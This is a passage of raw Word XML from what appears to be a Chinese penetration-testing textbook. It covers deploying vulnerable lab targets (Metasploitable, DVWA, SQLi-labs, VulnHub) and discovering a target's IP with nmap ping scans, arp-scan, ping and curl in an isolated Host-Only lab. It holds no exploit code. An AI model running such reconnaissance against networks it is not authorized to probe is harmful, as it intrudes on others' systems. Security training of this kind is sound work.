        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：启动后界面将出现登录提示，但其服务已自动运行，无需登录即可进行渗透。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploitable3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vagrant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Packer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构建，部署稍复杂。因其对宿主机性能要求较高，本书基础实验可仅用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2；若需</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机练习，可自行按官方文档搭建。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="部署-dvwa-与-sqli-labs"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi-labs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这两个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机通常需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LAMP（Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + Apache + MySQL + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP）环境。最简单的部署方式是在已安装</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LAMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的虚拟机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Server）中直接配置，或使用预置的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OVA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像（部分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">条目已集成）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以手动部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">到一台全新</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ubuntu Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">20.04（作为靶机虚拟机）为例：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 安装 LAMP</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apache2 mariadb-server php php-mysqli php-gd libapache2-mod-php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-y</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 下载 DVWA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> git clone https://github.com/digininja/DVWA.git</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> chown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> www-data:www-data DVWA/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cp DVWA/config/config.inc.php.dist DVWA/config/config.inc.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 编辑 config.inc.php，修改数据库密码等（此处使用占位 &lt;DB_PASS&gt;）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 启动 MySQL，创建 dvwa 数据库用户...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由于部署细节并非本书重点，且已经存在大量预构建打包镜像，建议初学者采用已集成的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OVA（如在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“DVWA”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取）直接导入，从而将精力聚焦于漏洞分析与利用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">此处给出的手动命令仅为说明原理，具体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">版本与依赖可能因时间而变化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。SQLi-labs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的部署方式类似，其源码可在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GitHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="vulnhub-镜像导入"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像导入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供了数以百计的挑战虚拟机（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.ova</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.vmx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式）。下载后，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Import Appliance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">导入，与导入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的方式相同。注意查阅镜像说明文档，了解其默认网络配置（有些是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP，有些是静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP）。为符合本书实验网络，请确保其网络适配器绑定至同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络。对于采用静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的镜像，可能需要通过单用户模式或挂载虚拟磁盘修改配置文件，使其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;LAB_SUBNET&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围内，或临时为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">添加辅助</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以实现通信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:id="52" w:name="靶机实操单元启动发现-ip-与连通性验证"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元：启动、发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与连通性验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本实操单元假定攻击机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与任意一台靶机均已接入同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络。操作者代表红队视角，在授权隔离环境中进行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐步命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">启动靶机并获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">信息</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2，只需启动虚拟机，无需登录；其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自动获取。若为其他需手动查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的靶机，可在其终端执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，记录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">enp0s3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（或类似）接口分配的地址，假设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节设定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;LAB_SUBNET&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围内。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">进行主机发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由于已预知子网范围，可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB_SUBNET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令将列出该网段内所有在线主机。从输出中根据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址（VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认分配</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">08:00:27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开头）或以往经验，即可识别靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">亦可用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arp-scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash  sudo arp-scan --localnet --interface eth1 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网卡为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">连通性验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若收到回复，表明二层/三层路径畅通。进一步，针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机，可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I http://&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
